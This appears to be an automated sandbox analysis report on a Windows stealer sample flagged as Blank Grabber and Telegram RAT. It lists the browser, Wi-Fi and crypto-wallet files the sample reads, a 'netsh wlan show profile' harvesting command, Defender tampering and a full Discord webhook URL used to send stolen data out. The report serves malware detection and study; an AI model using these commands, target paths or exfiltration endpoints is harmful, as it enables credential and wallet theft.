              Source: Yara matchFile source: 00000002.00000002.2400025008.000001F12AF00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.2042038226.000001F12AE4E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.2395753264.000001F12B202000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.2396649299.000001F12B202000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2028897385.000001A5F3614000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.2395270624.000001F12B657000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2028897385.000001A5F3616000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2400386354.000001F12B208000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: 9g9LZNE4bH.exe PID: 6176, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 9g9LZNE4bH.exe PID: 5860, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI61762\rarreg.key, type: DROPPED
              Yara detected Telegram RAT
              Source: Yara matchFile source: Process Memory Space: 9g9LZNE4bH.exe PID: 5860, type: MEMORYSTR
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2042414743.000001F12AE8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Electrum
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2042414743.000001F12AE8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxxz
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404785095.000001F12C004000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404785095.000001F12C004000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\keystore
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2042414743.000001F12AE8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Exodusz
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2042414743.000001F12AE8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Ethereum
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2404785095.000001F12C004000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
              Source: 9g9LZNE4bH.exe, 00000002.00000003.2042414743.000001F12AE8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Tries to harvest and steal WLAN passwords
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download ServiceJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\favicons.sqliteJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\ls-archive.sqliteJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.logJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storageJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\3e445a25-c088-46bb-968a-82532b92e486Jump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabaseJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqliteJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqliteJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_dbJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\FilesJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\content-prefs.sqliteJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasmJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\webappsstore.sqliteJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\jsJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CacheJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_dbJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqliteJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDBJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dirJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabaseJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code CacheJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension StateJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqliteJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\permissions.sqliteJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\protections.sqliteJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databasesJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage.sqliteJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dirJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqliteJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqliteJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-releaseJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCacheJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension RulesJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension ScriptsJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldbJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: Yara matchFile source: 00000002.00000002.2400025008.000001F12AF00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: 9g9LZNE4bH.exe PID: 5860, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected Blank Grabber
              Source: Yara matchFile source: 00000002.00000003.2042414743.000001F12AE8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.2042483409.000001F12AEA2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2400025008.000001F12AF00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.2042038226.000001F12AE4E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.2395753264.000001F12B202000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.2396649299.000001F12B202000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2028897385.000001A5F3614000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.2395270624.000001F12B657000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2028897385.000001A5F3616000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2400386354.000001F12B208000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: 9g9LZNE4bH.exe PID: 6176, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 9g9LZNE4bH.exe PID: 5860, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI61762\rarreg.key, type: DROPPED
              Yara detected Telegram RAT
              Source: Yara matchFile source: Process Memory Space: 9g9LZNE4bH.exe PID: 5860, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts241
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		4
              Disable or Modify Tools              		1
              OS Credential Dumping              		2
              System Time Discovery              		Remote Services1
              Archive Collected Data              		3
              Ingress Tool Transfer              		Exfiltration Over Other Network Medium1
              Data Encrypted for Impact
              CredentialsDomainsDefault Accounts1
              Native API              		2
              Registry Run Keys / Startup Folder              		1
              Access Token Manipulation              		11
              Deobfuscate/Decode Files or Information              		LSASS Memory2
              File and Directory Discovery              		Remote Desktop Protocol3
              Data from Local System              		21
              Encrypted Channel              		Exfiltration Over Bluetooth1
              System Shutdown/Reboot
              Email AddressesDNS ServerDomain Accounts22
              Command and Scripting Interpreter              		Logon Script (Windows)11
              Process Injection              		21
              Obfuscated Files or Information              		Security Account Manager48
              System Information Discovery              		SMB/Windows Admin Shares1
              Clipboard Data              		4
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts3
              PowerShell              		Login Hook2
              Registry Run Keys / Startup Folder              		11
              Software Packing              		NTDS151
              Security Software Discovery              		Distributed Component Object ModelInput Capture5
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Timestomp              		LSA Secrets2
              Process Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain Credentials141
              Virtualization/Sandbox Evasion              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
              Virtualization/Sandbox Evasion              		DCSync1
              Application Window Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              Access Token Manipulation              		Proc Filesystem1
              System Network Configuration Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
              Process Injection              		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1584119 Sample: 9g9LZNE4bH.exe Startdate: 04/01/2025 Architecture: WINDOWS Score: 100 67 ip-api.com 2->67 69 discord.com 2->69 83 Sigma detected: Capture Wi-Fi password 2->83 85 Multi AV Scanner detection for submitted file 2->85 87 Yara detected Blank Grabber 2->87 89 9 other signatures 2->89 11 9g9LZNE4bH.exe 22 2->11         started        signatures3 process4 file5 55 C:\Users\user\AppData\Local\Temp\...\rar.exe, PE32+ 11->55 dropped 57 C:\Users\user\AppData\Local\...\rarreg.key, ASCII 11->57 dropped 59 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 11->59 dropped 61 16 other files (none is malicious) 11->61 dropped 107 Modifies Windows Defender protection settings 11->107 109 Adds a directory exclusion to Windows Defender 11->109 111 Tries to harvest and steal WLAN passwords 11->111 113 2 other signatures 11->113 15 9g9LZNE4bH.exe 1 109 11->15         started        signatures6 process7 dnsIp8 71 ip-api.com 208.95.112.1, 49816, 80 TUT-ASUS United States 15->71 73 discord.com 162.159.137.232, 443, 49822 CLOUDFLARENETUS United States 15->73 75 Found many strings related to Crypto-Wallets (likely being stolen) 15->75 77 Tries to harvest and steal browser information (history, passwords, etc) 15->77 79 Modifies Windows Defender protection settings 15->79 81 5 other signatures 15->81 19 cmd.exe 1 15->19         started        22 cmd.exe 1 15->22         started        24 cmd.exe 1 15->24         started        26 24 other processes 15->26 signatures9 process10 signatures11 91 Suspicious powershell command line found 19->91 93 Encrypted powershell cmdline option found 19->93 95 Bypasses PowerShell execution policy 19->95 97 Uses netsh to modify the Windows network and firewall settings 19->97 28 powershell.exe 23 19->28         started        31 conhost.exe 19->31         started        99 Modifies Windows Defender protection settings 22->99 101 Removes signatures from Windows Defender 22->101 33 powershell.exe 23 22->33         started        43 2 other processes 22->43 103 Adds a directory exclusion to Windows Defender 24->103 35 powershell.exe 24->35         started        37 conhost.exe 24->37         started        105 Tries to harvest and steal WLAN passwords 26->105 39 getmac.exe 26->39         started        41 systeminfo.exe 26->41         started        45 46 other processes 26->45 process12 file13 115 Loading BitLocker PowerShell Module 28->115 117 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 39->117 119 Writes or reads registry keys via WMI 39->119 63 C:\Users\user\AppData\Local\Temp\BPWmX.zip, RAR 45->63 dropped 65 C:\Users\user\AppData\...\3lfchnc2.cmdline, Unicode 45->65 dropped 48 csc.exe 45->48         started        signatures14 process15 file16 53 C:\Users\user\AppData\Local\...\3lfchnc2.dll, PE32 48->53 dropped 51 cvtres.exe 48->51         started        process17

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              9g9LZNE4bH.exe46%VirustotalBrowse
              9g9LZNE4bH.exe42%ReversingLabsWin64.Trojan.Dacic

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\_MEI61762\VCRUNTIME140.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI61762\_bz2.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI61762\_ctypes.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI61762\_decimal.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI61762\_hashlib.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI61762\_lzma.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI61762\_queue.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI61762\_socket.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI61762\_sqlite3.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI61762\_ssl.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI61762\libcrypto-1_1.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI61762\libffi-8.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI61762\libssl-1_1.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI61762\python311.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exe0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI61762\select.pyd0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI61762\sqlite3.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\_MEI61762\unicodedata.pyd0%ReversingLabs

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://www.microsoftNAV_CO~1.JSOy.0%Avira URL Cloudsafe
              https://api.anonfiles.com/uploadr0%Avira URL Cloudsafe
              https://api.anonfiles.com/upload-0%Avira URL Cloudsafe
              http://www.microsoftTASKLI~1.TXTy.0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              discord.com
              		162.159.137.232
              		truefalse
                		high
                ip-api.com
                		208.95.112.1
                		truefalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://discord.com/api/webhooks/1324952562377691148/tMn5PGZkUcHw6GRus7vQh5nn9lZzv19crpx5XMfJnhrwGYXnAAQrWNBsuZgspVDvCX9cfalse
                    		high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://duckduckgo.com/chrome_newtab9g9LZNE4bH.exe, 00000002.00000003.2395753264.000001F12B1CA000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://github.com/Blank-c/BlankOBF9g9LZNE4bH.exe, 00000002.00000003.2040645327.000001F12BC08000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2041272550.000001F12AE8D000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2041841981.000001F12AE8D000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://www.avito.ru/9g9LZNE4bH.exe, 00000002.00000002.2404593794.000001F12BE50000.00000004.00001000.00020000.00000000.sdmpfalse
                          		high
                          https://duckduckgo.com/ac/?q=9g9LZNE4bH.exe, 00000002.00000003.2395753264.000001F12B1CA000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://api.telegram.org/bot9g9LZNE4bH.exe, 00000002.00000003.2042414743.000001F12AE8D000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2400025008.000001F12AF00000.00000004.00001000.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2042483409.000001F12AEA2000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2042038226.000001F12AE4E000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://github.com/Blank-c/Blank-Grabberi9g9LZNE4bH.exe, 00000002.00000003.2042414743.000001F12AE8D000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2042483409.000001F12AEA2000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2042038226.000001F12AE4E000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://crl.microsoftpowershell.exe, 0000002A.00000002.2299859889.000001C053700000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://www.ctrip.com/9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmpfalse
                                    		high
                                    https://github.com/Blank-c/Blank-Grabberr9g9LZNE4bH.exe, 00000002.00000003.2042414743.000001F12AE8D000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2042483409.000001F12AEA2000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2042038226.000001F12AE4E000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://github.com/urllib3/urllib3/issues/21689g9LZNE4bH.exe, 00000002.00000003.2050316287.000001F12AE72000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#9g9LZNE4bH.exe, 00000002.00000003.2032440524.000001F12AB01000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2033778965.000001F128D5B000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2398637648.000001F128D27000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.leboncoin.fr/9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmpfalse
                                            		high
                                            https://tools.ietf.org/html/rfc2388#section-4.49g9LZNE4bH.exe, 00000002.00000002.2399506698.000001F12AD13000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://github.com/urlli?Z9g9LZNE4bH.exe, 00000002.00000002.2399793593.000001F12AEF9000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2143833487.000001F12AEF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base649g9LZNE4bH.exe, 00000002.00000002.2398637648.000001F128D6A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://weibo.com/9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C4A4000.00000004.00001000.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://api.anonfiles.com/upload9g9LZNE4bH.exe, 00000002.00000002.2400025008.000001F12AF00000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://www.msn.com9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C4FC000.00000004.00001000.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2137521294.000001F12BAA0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://api.anonfiles.com/upload-9g9LZNE4bH.exe, 00000002.00000002.2400025008.000001F12AF00000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://nuget.org/nuget.exepowershell.exe, 00000007.00000002.2222117000.000001B991E34000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2291396544.000001C04B3F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2242595273.000001C03CCF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2291396544.000001C04B53C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://discord.com/api/v9/users/9g9LZNE4bH.exe, 00000002.00000003.2042038226.000001F12AE4E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
